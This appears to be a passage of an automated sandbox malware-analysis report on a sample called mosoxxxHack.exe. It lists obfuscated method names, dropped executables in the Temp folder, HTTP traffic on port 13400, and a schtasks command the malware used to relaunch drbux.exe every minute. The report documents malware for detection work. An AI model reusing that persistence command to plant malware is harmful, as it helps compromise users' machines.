Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form7.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'm0EQumEgE8', 'qu6Nh1hjpW', 'P52NEs4n8U', 'WuS90DV8sg', 'eas9I3CJ33', 'GWsaMExoq6', 'wx0al1ua78', 'CKDaZFxMxJ'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form13.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'teoS1ZT4jC', 'EDg6rACw6u', 'sMm6jvD2LB', 'xX967iYkI7', 'nu76FVrNja', 'uOw6txwHvR', 'Fua61Q7kIf', 'Pcn6Xjtl20'
Source: 25.2.a.exe.5f0000.1.unpack, HF_Cam/Form10.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'M1gJFi1MPv', 't1F8eCv1Aq', 'NGZ8B4LYxu', 'RFc8QKfOnp', 'Ro08Oc63cC', 'V7O8a0oQsD', 'nST8VcLDsi', 'RDM8yGlyPQ'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form8.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'a2XQ01sX3p', 'EQ6aK52YWA', 'Ch7axEP0Gb', 'Py4eTJ2g6C', 'WcSeD1GUea', 'SLqeyN94xg', 'mAveSVtKgW', 'wUtB6QGq6H'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form1.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'HeMuoHnPNR', 'QhM9nPOODt', 'esS9A4MHL0', 'htU92PqaOQ', 'wuf9Lka2Ku', 'n6x9fOcaY0', 'e2w9CI68Ml', 'tR79G8PWVn'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form14.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'VW7ShTVMtC', 'y1m6fMliOR', 'KD36CMLlKs', 'kau8qPxc2B', 'Qch8Rj6myf', 'hTR6GMfqIV', 'Nyc6o5Vhve', 'MDg6ulhUTT'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form19.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'OlZZ23UcMW', 'LRo666O7dq', 'YTs6vKiIcX', 'qu6Nh1hjpW', 'P52NEs4n8U', 'bdSvgi2Tcy', 'bnsvwKhuuo', 'XLivsloMOU'
Source: 26.0.drbux.exe.d70000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	High entropy of concatenated method names: '.cctor', 'A3Vd6mDfIxdn1', 'OLJqO2IArs', 'ErgqxYetMV', 'V1eqkrpc9W', 'sMAqCoBcch', 'AGNqhxio36', 'zaBqLcTSy7', 'yMWqdABfe6', 'cpUqKWc8Kl'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form3.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'ud0BmsGVq0', 'Qf9eJLxlnI', 'BcqebgEg3w', 'mTGeUO1gFS', 'sZue4ok0PI', 'vN8eKrrFeA', 'RdEexZ8DH2', 'qu6Nh1hjpW'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form12.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jqZRG89nyo', 'xqYYcS6ugv', 'E4OYN1Ke2i', 'TT4Y9I9llj', 'MydYHxf2pO', 'V7O8a0oQsD', 'nST8VcLDsi', 'nHJY8cJbd9'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form11.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'E8UJAlSR48', 's4A8ZrtEcl', 'NxV855X5HV', 'WuS90DV8sg', 'eas9I3CJ33', 'RI88Wcxkxv', 'mNA8me0Lqi', 'V7O8a0oQsD'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form6.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jfKbqoTPyI', 'LVganV68OH', 'uqWaA4KE2P', 'RDM8yGlyPQ', 'btL8SyOKOJ', 'o6Ea27U7lq', 'Pk5aLhekw2', 'RI88Wcxkxv'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/frmEnvironment.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'QJJiKBO3n', 'dIjNeWQyFQ', 'Xp1NB5EEwe', 'fbqNQA2Znd', 'dqiNOvyEEt', 'OI2NaqTFsA', 'Ow1NVx3tsp', 'oFsNydyMTx'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/frmHfCam.cs	High entropy of concatenated method names: '.ctor', 'SiKGp1RK7W', 'b18GgJPGTe', 'FMJGNwB1gv', 'YZrGmbULmN', 'RkXGUEhK7B', 'aThGwB7PbS', 'TB6G93JvTm', 'JinGYdZdIQ', 'v7hG32742p'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form16.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'iZYslN1Ui9', 'qu6Nh1hjpW', 'P52NEs4n8U', 'fZuvnc1O5t', 'fC0vACbpen', 'gPmv2VT6hV', 'X0wvLtHqNi', 'aIpvfkOJUt'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form20.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'nhRBq5U98b', 'SLqeyN94xg', 'mAveSVtKgW', 'Py4eTJ2g6C', 'WcSeD1GUea', 'dNXeh4Hmx2', 'uGpeEyDyo4', 'obMeM6TNTS'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form4.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'DpPFNo4rb6', 'qu6Nh1hjpW', 'P52NEs4n8U', 't4lQ0V8JIM', 'VZ6QI0bnI2', 'XLivsloMOU', 'ifqvkquyKr', 'PM1e7tWw0S'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form18.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'yGbZa9dVdY', 'V7O8a0oQsD', 'nST8VcLDsi', 'etkvyfa3TD', 'kDRvSmYNJN', 'jBR8hKEAOq', 'fuQ8Exql4N', 'qu6Nh1hjpW'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form5.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'peb5xBDqZw', 'cKFQhattTg', 'bxcQENh0cv', 'lq9QMwJBAh', 'sh5QllDTbZ', 'SVSQZ40qlq', 'aBiQ54tM7m', 'IANQW6AtAx'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form10.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'M1gJFi1MPv', 't1F8eCv1Aq', 'NGZ8B4LYxu', 'RFc8QKfOnp', 'Ro08Oc63cC', 'V7O8a0oQsD', 'nST8VcLDsi', 'RDM8yGlyPQ'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/frmLineNumbering.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'CsY1sjPl5R', 'bpvTJ2F1Bm', 'ploTbML45e', 'Om5TUXw4FT', 'cfBT42fx85', 'yi8TKx96Ap', 'We6Tx90Old', 'p0ETgQRZE5'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form15.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'nvXlrxs5Jb', 'xlDvrUDjxT', 'LaHvjBpySC', 'VxDv7MUouc', 'wJVvFrY61F', 'V7O8a0oQsD', 'nST8VcLDsi', 'Mw368UbuhE'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form7.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'm0EQumEgE8', 'qu6Nh1hjpW', 'P52NEs4n8U', 'WuS90DV8sg', 'eas9I3CJ33', 'GWsaMExoq6', 'wx0al1ua78', 'CKDaZFxMxJ'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form9.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jesEZBWgGT', 'h7Xa3VbFQC', 'wjLaz2jIVc', 'RDM8yGlyPQ', 'btL8SyOKOJ', 'NtRVrxWa6o', 'yvMVjv47LW', 'V7O8a0oQsD'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form13.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'teoS1ZT4jC', 'EDg6rACw6u', 'sMm6jvD2LB', 'xX967iYkI7', 'nu76FVrNja', 'uOw6txwHvR', 'Fua61Q7kIf', 'Pcn6Xjtl20'
Source: 26.0.drbux.exe.d70000.0.unpack, HF_Cam/Form17.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'taBsKPFWOM', 'V7O8a0oQsD', 'nST8VcLDsi', 'CsxveFqWc8', 'vWJvBkp1jr', 'X50vQKlvmV', 'SaTvOw0Reg', 'qu6Nh1hjpW'
Source: 26.2.drbux.exe.d70000.0.unpack, DRB1v1T8S8g00PqFQs/BhQ1jSeci7lKnt8QNa.cs	High entropy of concatenated method names: '.cctor', 'A3Vd6mDfIxdn1', 'OLJqO2IArs', 'ErgqxYetMV', 'V1eqkrpc9W', 'sMAqCoBcch', 'AGNqhxio36', 'zaBqLcTSy7', 'yMWqdABfe6', 'cpUqKWc8Kl'
Source: clp[1].exe0.32.dr, HF_Cam/Form9.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'i9LGidK5Pq', 'qLDmwMSefn', 'k9RmzGLrnK', 'aDbbRFFrCI', 'OQjb15sRKV', 'jlFKlEpKgU', 'rF8KqGk9DH', 'EaZbmrb2hY'
Source: clp[1].exe0.32.dr, HF_Cam/frmLineNumbering.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jZduvPRf1A', 'QP1CfbdOjU', 'lS3Cj0V3a6', 'tuCChaWUvB', 'rIKC01xv6a', 'kWhCEHFBSK', 'ihqC7RmRjo', 'PiPCSPYZYx'
Source: clp[1].exe0.32.dr, HF_Cam/Form1.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'Yt3sEX3MaB', 'gB9QIflWeK', 'OWnQGHgXSk', 'QbJQ2H7If4', 'CNOQxrEuup', 'NddQJxSEZk', 'WO8Qa1kCpU', 'W8EQDCjwaj'
Source: clp[1].exe0.32.dr, HF_Cam/frmHfCam.cs	High entropy of concatenated method names: '.ctor', 'pNUkqdLpJ6', 'bclkxotQWI', 'xOxkFFrtIJ', 'g6Ekjk41PB', 'fbZkH5TTse', 'QhUk7jO8Nm', 'xJ6kTARYJu', 'OG1kcPvJUq', 'QwPkho8ylr'
Source: clp[1].exe0.32.dr, HF_Cam/Form3.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'sDplj4djkV', 'wEPifRZwkZ', 'O8QijWi01G', 'wo0ihKRCFg', 'R7pi0A7gZ7', 'CE4iE7ycRH', 'JWDi7LyHf3', 'oyftvrc41t'
Source: clp[1].exe0.32.dr, epK0KZUFaasIUKsyJ4/T7RBVOnrKBBxJtHYk6.cs	High entropy of concatenated method names: '.cctor', 'PBpUIMwhaIACU', 'ao193qRQE1', 'RTE9ZwbFQY', 't8u9ruCY1X', 'TEX92MkPBE', 'EsU9X8Rvya', 'M2x9o06nSQ', 'z4k9p2mj6u', 'abO9OUQrwi'
Source: clp[1].exe0.32.dr, HF_Cam/Form12.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'tkV5kWqg4b', 'AXSW4oUvZW', 'l9xWtydfNO', 'CBqWQssrvs', 'NotW8FA4wW', 'EaZbmrb2hY', 'iBibK56hZc', 'UZ4WbkU7l9'
Source: clp[1].exe0.32.dr, k545gPd3EEVeKJYGLq/fuDkfvmxleIhirG8TL.cs	High entropy of concatenated method names: 'si0W7FClDb', 'pwbWTw71YU', 'RFtWckGcUR', '.ctor', 'o0fjrf8i7fJBu', '.cctor', 'AKlYhuvIn4uFNOaj7V', 'iWaldMa8Jou6xgTuXW', 'VL8Gme9acsB8OMNeWV', 'e2VhEpFJiAO8CKJw36'
Source: clp[1].exe0.32.dr, HF_Cam/Form19.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'bMWiJA6Zjs', 'pB0eeooSYU', 'e6GerYa54J', 'oyftvrc41t', 'wpotnEkTP2', 'KrbrSEN6tX', 'hqgrUjupeu', 'X96rPTvmmN'
Source: clp[1].exe0.32.dr, HF_Cam/Form18.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'eZ3igYRSXK', 'EaZbmrb2hY', 'iBibK56hZc', 'vc6rRWvStf', 'qlVr1si0yI', 'rGfbvYJlDB', 'UEcbnfV4YO', 'oyftvrc41t'
Source: clp[1].exe0.32.dr, HF_Cam/Form14.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'YbMSX9iOMF', 'lUteJyZ7FX', 'hJ4eak9ZCU', 'VHBboExR6I', 'VZ3buumP91', 'WuteDh72wy', 'yBUeplGp7N', 'yQdeZVYNLU'
Source: clp[1].exe0.32.dr, HF_Cam/Form11.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'jgLL0POxTS', 'pCibLu0Di7', 'd8PbTmHmBe', 'aeCQdMVfur', 'vNJQNWSZue', 'QMGbcKLuMU', 'a3WbFPb6qp', 'EaZbmrb2hY'
Source: clp[1].exe0.32.dr, HF_Cam/Form6.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'rwL196vfKs', 'HJBmIg00Do', 'M8UmGknw67', 'aDbbRFFrCI', 'OQjb15sRKV', 'vWXm2GGPk3', 'sN7mxIbjGR', 'QMGbcKLuMU'
Source: clp[1].exe0.32.dr, HF_Cam/Form10.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'n42LDPUwK8', 'uL6biWiNJJ', 'Cuyb9tiyI5', 'XqFbsnn8Ie', 'xppbyZlgHR', 'EaZbmrb2hY', 'iBibK56hZc', 'aDbbRFFrCI'
Source: clp[1].exe0.32.dr, HF_Cam/frmEnvironment.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'pbA4bJnu2', 'n9xtiLNd9k', 'QTit9waSGa', 'ljMtsTU6J7', 'Y3ZtyY8VRK', 'atGtmNfFNB', 'hPdtKxL9KE', 'OahtRtwqLg'
Source: clp[1].exe0.32.dr, HF_Cam/Form7.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'YlhYsXhL5O', 'oyftvrc41t', 'wpotnEkTP2', 'aeCQdMVfur', 'vNJQNWSZue', 'PCvmYe5y1v', 'YVrmHOiWLI', 'j9amLyGKw7'
Source: clp[1].exe0.32.dr, HF_Cam/Form16.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'PfuvBJbZTG', 'oyftvrc41t', 'wpotnEkTP2', 'Re8rIXChCR', 'WR1rGVymTu', 'nhQr21flDv', 'ADGrxukMKL', 'NPhrJXlgXY'
Source: clp[1].exe0.32.dr, HF_Cam/Form13.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'SnUSuFN1Tg', 'RS9elLM7iJ', 'hfCeqJfuHo', 'a5Re5D6RTL', 'HmHeA1UUAQ', 'PWSeOi7ZNt', 'lnOeXOMRDH', 'ENNeg22ArW'
Source: clp[1].exe0.32.dr, HF_Cam/Form8.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'JtXYmg03uO', 'Ja8mEJygdw', 'wi7m7yELck', 'IxBiCHAr1H', 'g2ii6cW2T0', 't0iiRd84A5', 'fi0i1fq9uJ', 't309epB0Sg'
Source: clp[1].exe0.32.dr, HF_Cam/Form20.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'X6Ol9U1XSt', 't0iiRd84A5', 'fi0i1fq9uJ', 'IxBiCHAr1H', 'g2ii6cW2T0', 'gR3ivFoeh8', 'VCpinTZ7pv', 'MX5iYrhISR'
Source: clp[1].exe0.32.dr, HF_Cam/Form5.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'OtfQZX6ZZw', 'Cgosvki4vh', 'yqWsnWLyMv', 'RM8sYKnCvL', 'A5JsHFdWqc', 'REfsLwUOXb', 'NOfsT4SfkL', 'I85scHWHXl'
Source: clp[1].exe0.32.dr, HF_Cam/Form15.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'r6PB8G76mx', 'm4ErlkWxc5', 'YgQrquuJtB', 'KbGr5DKx5v', 'e6TrAfF3jJ', 'EaZbmrb2hY', 'iBibK56hZc', 'phbebo0MTW'
Source: clp[1].exe0.32.dr, HF_Cam/Form17.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'TjdvOp0P2S', 'EaZbmrb2hY', 'iBibK56hZc', 'aIQriqmL1J', 'UsWr9irSvB', 'PDursvdDYs', 'TFqry67kIi', 'oyftvrc41t'
Source: clp[1].exe0.32.dr, HF_Cam/Form4.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'YdjDFmHiWg', 'oyftvrc41t', 'wpotnEkTP2', 'sQPsdVav6n', 'F2ysNb6kva', 'X96rPTvmmN', 'PmArMuF2yW', 'b2Li5rJQLc'

Source: C:\Users\user\AppData\Local\Temp\a.exe	File created: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe			Jump to dropped file
Source: C:\Users\user\Desktop\mosoxxxHack.exe	File created: C:\Users\user\AppData\Local\Temp\a.exe			Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN drbux.exe /TR 'C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe' /F

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 13400
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 13400
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 13400
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 13400
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 13400
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 13400 -> 49714

Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mosoxxxHack.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
